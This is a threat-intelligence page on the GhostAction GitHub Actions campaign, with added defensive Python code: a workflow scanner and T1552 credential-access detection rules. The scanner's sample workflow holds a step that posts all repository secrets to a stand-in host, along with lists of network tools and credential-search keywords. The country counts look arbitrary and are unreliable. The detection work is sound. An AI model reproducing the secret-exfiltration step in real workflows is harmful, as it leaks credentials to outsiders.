Ghost Action: The Silent Workflow Heist

Tags: GhostAction, Supply Chain Attack, GitHub Security

The GhostAction campaign targeted GitHub workflows to steal sensitive data. Attackers injected malicious workflows into public repositories, which then exfiltrated credentials and tokens to attacker-controlled servers. The incident compromised hundreds of repositories and exposed thousands of secrets, including API keys, package manager tokens, and cloud access credentials.
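
The attack pattern summarised above (a workflow that can read repository secrets and also talks to an outside host) is something a defender can screen for before a workflow change is merged. The scanner below is an added example, not code from the original page or from any project behind the campaign. It assumes ordinary GitHub Actions syntax, uses a line-based heuristic rather than a full YAML parser, and the sample workflow and the host example.invalid are constructed for the demonstration.

```python
"""Heuristic screen for GitHub Actions workflows: flag steps that both
reference repository secrets and invoke an outbound network tool.
Added example; assumed heuristic, not the campaign's actual workflow."""
import re

# Expressions that pull secrets into a step: ${{ secrets.NAME }} or ${{ toJSON(secrets) }}
SECRET_REF = re.compile(
    r"\$\{\{\s*(toJSON\(\s*secrets\s*\)|secrets\.[A-Za-z_][A-Za-z0-9_]*)\s*\}\}"
)
# Tools that can move data off the runner (assumed list; extend per environment).
NETWORK_TOOL = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|Invoke-RestMethod)\b")
# URL literals, reported so a reviewer sees where a flagged step connects.
URL = re.compile(r"https?://[^\s'\"`]+")

# Constructed sample workflow: three benign steps and one that ships all secrets out.
SAMPLE_WORKFLOW = """\
name: CI
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run tests
        run: npm test
      - name: Publish
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
        run: npm publish
      - name: Collect diagnostics
        run: |
          curl -s -X POST -d '${{ toJSON(secrets) }}' https://example.invalid/collect
"""


def split_steps(workflow_text):
    """Split a workflow into (step_name, step_text) chunks.

    Heuristic: after a 'steps:' line, every '- key:' line starts a new step.
    Good enough for screening; it is not a YAML parser."""
    steps, current, name, in_steps = [], [], None, False
    for line in workflow_text.splitlines():
        if re.match(r"^\s*steps:\s*$", line):
            in_steps = True
            continue
        if not in_steps:
            continue
        m = re.match(r"^\s*-\s+([A-Za-z_-]+):\s*(.*)$", line)
        if m:
            if current:
                steps.append((name, "\n".join(current)))
            current = [line]
            name = m.group(2).strip() if m.group(1) == "name" else None
        else:
            current.append(line)
    if current:
        steps.append((name, "\n".join(current)))
    return steps


def scan_workflow(workflow_text):
    """Return one finding per step that references secrets AND calls a network tool."""
    findings = []
    for idx, (name, text) in enumerate(split_steps(workflow_text)):
        secrets = sorted({m.group(0) for m in SECRET_REF.finditer(text)})
        tools = sorted(set(NETWORK_TOOL.findall(text)))
        if secrets and tools:
            findings.append({
                "step": name or f"step-{idx}",
                "secrets": secrets,
                "tools": tools,
                "urls": sorted(set(URL.findall(text))),
            })
    return findings


if __name__ == "__main__":
    for finding in scan_workflow(SAMPLE_WORKFLOW):
        print(f"step {finding['step']!r}: secrets {finding['secrets']} "
              f"-> {finding['tools']} {finding['urls']}")
```

Only the "Collect diagnostics" step is reported; the "Publish" step uses a token legitimately through the package manager and so is not in the tool list, which is also the heuristic's blind spot: a workflow can leak a secret through any program that opens a socket. The screen is therefore a review aid to be combined with pinning actions to commit SHAs, scoping secrets to protected environments, and requiring review for changes under .github/workflows.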

Indicators of Compromise

No domains found for this campaign

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

T1190 – Exploit Public-Facing Application

| ID | Data Source | Data Component | Detects |
| --- | --- | --- | --- |
| DS0015 | Application Log | Application Log Content | Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Web Application Firewalls may detect improper inputs attempting exploitation. Web server logs (e.g., /var/log/httpd or /var/log/apache for Apache web servers on Linux) may also record evidence of exploitation. |
| DS0029 | Network Traffic | Network Traffic Content | Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection strings or known payloads. For example, monitor for successively chained functions that adversaries commonly abuse (i.e. gadget chaining) through unsafe deserialization to exploit publicly facing applications for initial access. [114] In AWS environments, monitor VPC flow logs and/or Elastic Load Balancer (ELB) logs going to and from instances hosting externally accessible applications. |

T1552 – Unsecured Credentials

| ID | Data Source | Data Component | Detects |
| --- | --- | --- | --- |
| DS0015 | Application Log | Application Log Content | Monitor application logs for activity that may highlight malicious attempts to access application data, especially abnormal search activity targeting passwords and other artifacts related to credentials. [12] |
| DS0017 | Command | Command Execution | While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See Valid Accounts for more information. |
| DS0022 | File | File Access | Monitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior. Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like cat ~/.bash_history. |
| DS0009 | Process | Process Creation | Monitor newly executed processes that may search compromised systems to find and obtain insecurely stored credentials. |
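
The DS0017, DS0022 and DS0009 rows above describe three detections in prose: credential-related keywords on a command line, a direct read of .bash_history with a file utility rather than the shell's history builtin, and one process reading many files in a short window. The code below turns them into rules run over sample events. It is an added example, not part of the original page or of MITRE's own tooling; the event line format, the keyword list (taken from the DS0017 row), the burst threshold of 10 reads in 5 seconds and the sample log lines are all constructed for the demonstration, and real telemetry (auditd, Sysmon, an EDR feed) needs its own parser.

```python
"""T1552 detection rules over process-creation and file-access events.
Added example with a constructed log format; thresholds are assumptions."""
import re
from collections import defaultdict
from datetime import datetime

# One event per line: "<iso-timestamp> <pid> <user> <exec|file_read> <detail>"
EVENT = re.compile(r"^(\S+) (\d+) (\S+) (exec|file_read) (.*)$")
# Keywords from the DS0017 guidance. "pwd" also matches the shell builtin, so tune per environment.
CRED_SEARCH = re.compile(r"\b(password|passwd|pwd|login|secure|credentials?)\b", re.IGNORECASE)
# A file utility reading .bash_history directly, as opposed to the "history" builtin.
HISTORY_READ = re.compile(r"\b(cat|less|more|head|tail|grep|strings|cp|scp)\b[^|;&]*\.bash_history")
BURST_THRESHOLD = 10   # file reads by one pid ...
BURST_WINDOW_S = 5     # ... within this many seconds (assumed values)

# Constructed sample: one keyword search, one benign history call, one direct
# history read, one benign editor launch, a 12-file read burst, one lone read.
SAMPLE_LOG = [
    '2025-01-01T10:00:01Z 4101 alice exec cmd="grep -ri password /etc/app"',
    '2025-01-01T10:00:02Z 4102 alice exec cmd="history | tail -n 20"',
    '2025-01-01T10:00:03Z 4103 alice exec cmd="cat /home/alice/.bash_history"',
    '2025-01-01T10:00:04Z 4104 bob exec cmd="vim notes.txt"',
] + [
    f"2025-01-01T10:00:{5 + i // 4:02d}Z 4105 bob file_read path=/home/bob/project/conf{i}.ini"
    for i in range(12)
] + [
    "2025-01-01T10:01:30Z 4106 bob file_read path=/home/bob/notes.txt",
]


def parse(lines):
    """Parse event lines into dicts; malformed lines are skipped, not fatal."""
    events = []
    for line in lines:
        m = EVENT.match(line)
        if not m:
            continue
        ts = datetime.fromisoformat(m.group(1).replace("Z", "+00:00"))
        events.append({"ts": ts, "pid": int(m.group(2)), "user": m.group(3),
                       "kind": m.group(4), "detail": m.group(5)})
    return events


def detect(lines):
    """Apply the three rules and return a list of finding dicts."""
    findings = []
    reads = defaultdict(list)   # pid -> file_read events
    for ev in parse(lines):
        if ev["kind"] == "exec":
            cmd = ev["detail"]
            kw = CRED_SEARCH.search(cmd)
            if kw:
                findings.append({"rule": "credential_search", "pid": ev["pid"],
                                 "user": ev["user"], "evidence": kw.group(0)})
            if HISTORY_READ.search(cmd):
                findings.append({"rule": "bash_history_read", "pid": ev["pid"],
                                 "user": ev["user"], "evidence": cmd})
        else:
            reads[ev["pid"]].append(ev)
    # Burst rule: largest number of reads by one pid inside a sliding time window.
    for pid, evs in reads.items():
        evs.sort(key=lambda e: e["ts"])
        best, j = 0, 0
        for i in range(len(evs)):
            while (evs[i]["ts"] - evs[j]["ts"]).total_seconds() > BURST_WINDOW_S:
                j += 1
            best = max(best, i - j + 1)
        if best >= BURST_THRESHOLD:
            findings.append({"rule": "file_read_burst", "pid": pid,
                             "user": evs[0]["user"], "count": best})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f)
```

On the sample, pid 4101 trips the keyword rule, pid 4103 the direct .bash_history read, and pid 4105 the burst rule with 12 reads in under 5 seconds; the "history | tail" call and the single read by pid 4106 stay quiet. The keyword rule is the noisiest of the three and is best scoped to interactive sessions or to processes that are not in an allowlist of known configuration readers.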

Observed Countries (250)

AD (454)
AE (596)
AF (189)
AG (590)
AI (157)
AL (421)
AM (96)
AO (114)
AQ (54)
AR (451)
AS (672)
AT (470)
AU (213)
AW (487)
AX (10)
AZ (319)
BA (620)
BB (109)
BD (301)
BE (708)
BF (282)
BG (898)
BH (121)
BI (922)
BJ (935)
BL (440)
BM (481)
BN (734)
BO (846)
BQ (778)
BR (854)
BS (926)
BT (852)
BV (666)
BW (274)
BY (540)
BZ (833)
CA (66)
CC (129)
CD (40)
CF (966)
CG (711)
CH (123)
CI (73)
CK (684)
CL (186)
CM (856)
CN (66)
CO (629)
CR (735)
CU (437)
CV (902)
CW (844)
CX (463)
CY (115)
CZ (539)
DE (935)
DJ (775)
DK (100)
DM (270)
DO (630)
DZ (942)
EC (505)
EE (93)
EG (380)
EH (718)
ER (358)
ES (180)
ET (59)
FI (967)
FJ (938)
FK (666)
FM (448)
FO (249)
FR (750)
GA (864)
GB (758)
GD (52)
GE (584)
GF (272)
GG (599)
GH (715)
GI (616)
GL (934)
GM (181)
GN (183)
GP (238)
GQ (508)
GR (624)
GS (252)
GT (392)
GU (560)
GW (927)
GY (874)
HK (624)
HM (874)
HN (367)
HR (158)
HT (558)
HU (703)
ID (599)
IE (582)
IL (671)
IM (59)
IN (158)
IO (823)
IQ (630)
IR (208)
IS (499)
IT (191)
JE (160)
JM (824)
JO (490)
JP (160)
KE (928)
KG (397)
KH (128)
KI (784)
KM (995)
KN (758)
KP (706)
KR (486)
KW (862)
KY (468)
KZ (18)
LA (21)
LB (384)
LC (400)
LI (437)
LK (334)
LR (825)
LS (73)
LT (147)
LU (381)
LV (950)
LY (921)
MA (585)
MC (658)
MD (255)
ME (362)
MF (48)
MG (738)
MH (611)
MK (645)
ML (660)
MM (420)
MN (853)
MO (702)
MP (944)
MQ (347)
MR (151)
MS (269)
MT (654)
MU (415)
MV (633)
MW (48)
MX (102)
MY (134)
MZ (504)
NA (537)
NC (567)
NE (116)
NF (776)
NG (548)
NI (511)
NL (649)
NO (7)
NP (636)
NR (37)
NU (642)
NZ (656)
OM (494)
PA (349)
PE (617)
PF (812)
PG (321)
PH (937)
PK (271)
PL (441)
PM (867)
PN (294)
PR (367)
PS (5)
PT (98)
PW (877)
PY (5)
QA (209)
RE (458)
RO (318)
RS (166)
RU (992)
RW (656)
SA (500)
SB (410)
SC (260)
SD (120)
SE (308)
SG (887)
SH (839)
SI (514)
SJ (701)
SK (904)
SL (290)
SM (705)
SN (456)
SO (878)
SR (891)
SS (35)
ST (420)
SV (707)
SX (95)
SY (842)
SZ (547)
TC (907)
TD (121)
TF (824)
TG (267)
TH (725)
TJ (779)
TK (43)
TL (653)
TM (14)
TN (638)
TO (627)
TR (657)
TT (461)
TV (519)
TW (665)
TZ (371)
UA (834)
UG (222)
UM (125)
US (399)
UY (640)
UZ (804)
VA (63)
VC (623)
VE (573)
VG (326)
VI (965)
VN (889)
VU (234)
WF (777)
WS (886)
XK (921)
YE (343)
YT (884)
ZA (637)
ZM (473)
ZW (816)